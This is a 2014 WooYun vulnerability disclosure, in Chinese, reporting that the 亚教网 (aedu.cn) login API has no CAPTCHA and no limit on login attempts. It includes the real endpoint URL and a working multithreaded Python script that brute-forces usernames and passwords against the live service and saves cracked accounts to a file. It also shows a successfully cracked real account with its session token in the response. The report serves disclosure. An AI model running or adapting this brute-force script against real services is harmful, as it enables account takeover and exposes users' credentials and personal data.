当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052558

漏洞标题:亚教网登录API接口无验证码及登录次数限制可爆破

相关厂商:亚教网

漏洞作者: k0ppa

提交时间:2014-03-04 12:08

修复时间:2014-04-18 12:08

公开时间:2014-04-18 12:08

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-04-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

亚教网登录API可直接抓包获得,接口无验证码及登录次数限制可导致用户id被爆破或批量扫号

详细说明:

抓包得到接口:http://passport.aedu.cn/api/getlogin?callback=jQuery191045942397392354906_1393519178458&uid=admin&pwd=admin&_=1393519178461
去掉一些意义不明的参数不影响结果 得到
http://passport.aedu.cn/api/getlogin?uid=admin&pwd=admin
直接浏览器访问之
得到结果:({"status":-2,"msg":"密码不正确"})
多次尝试无验证码或冻结 比如说用这一段代码

import urllib
import urllib2
import cookielib
import json
import threading
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
urllib2.install_opener(opener)
outFile = open('acc_cracked.txt','w')
def tryLogin(user,password):
	#print user,password
	global outFile
	user = user.strip()
	passwd = password.strip()
	req = urllib2.Request("http://passport.aedu.cn/api/getlogin?","uid=%s&pwd=%s" % (user,passwd))
	req.add_header("Referer","http://www.aedu.cn/")
	resp = urllib2.urlopen(req) 
	returnMsg = resp.read()[1:-1]
	#print returnMsg
	status = json.loads(returnMsg)
	statusNum = status['status']#=0 -> stop,=-2 -> retry,=other -> report returnMsg
	if statusNum == 0:
		print '----- find user:', user, 'with password:', passwd, '-----'
		outFile.write(user + '    ' +  passwd + '      statusNum:' + str(statusNum) + '\n')
   	return
if __name__ == '__main__':
	tsk=[]
	with open(r'user.dic', 'r') as fUser:
		with open(r'pass.dic', 'r') as fPass:
			for user in fUser:
				for password in fPass.readlines():
					t = threading.Thread(target = tryLogin,args=(user,password))
					t.deamon = False
					tsk.append(t)
				fPass.seek(0)
#cant call join before thread start
	for t in tsk:
 		t.start()
		t.join(1)
 	print "All thread OK,maybe not "
 	outFile.close()


pass.dic内容设置为
1324189
fjdisajfij
fjsdifu
321948190
dasjifji
r9iwufoafj9a
unvs123[int
user.dic内容设置为s
最后成功爆破

漏洞证明:

用一个意外输入出来的弱口令神id(密码我已经改过)
http://passport.aedu.cn/api/getlogin?uid=s&pwd=unvs123[int
返回结果
({"status":0,"msg":{"Id":5688783,"UserRole":3,"UserName":"理工扛把子","UserFace":"default.jpg","Token":"2254E639DD3C43168964F20BF20BF5A61627379692","BlogAddress":"5688783","LoginTime":"2014-03-02T18:00:46.2827413+08:00","IsSaveLoginState":true,"SaveStateTime":"2014-03-05T18:00:46.2827413+08:00","PublicProperty":null,"Integral":0,"SchoolId":0,"SchoolName":"亚洲教育网","ClassId":0}})
登录成功√

修复方案:

加入验证码请求或者登录次数限制~
求礼物

版权声明:转载请注明来源 k0ppa@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝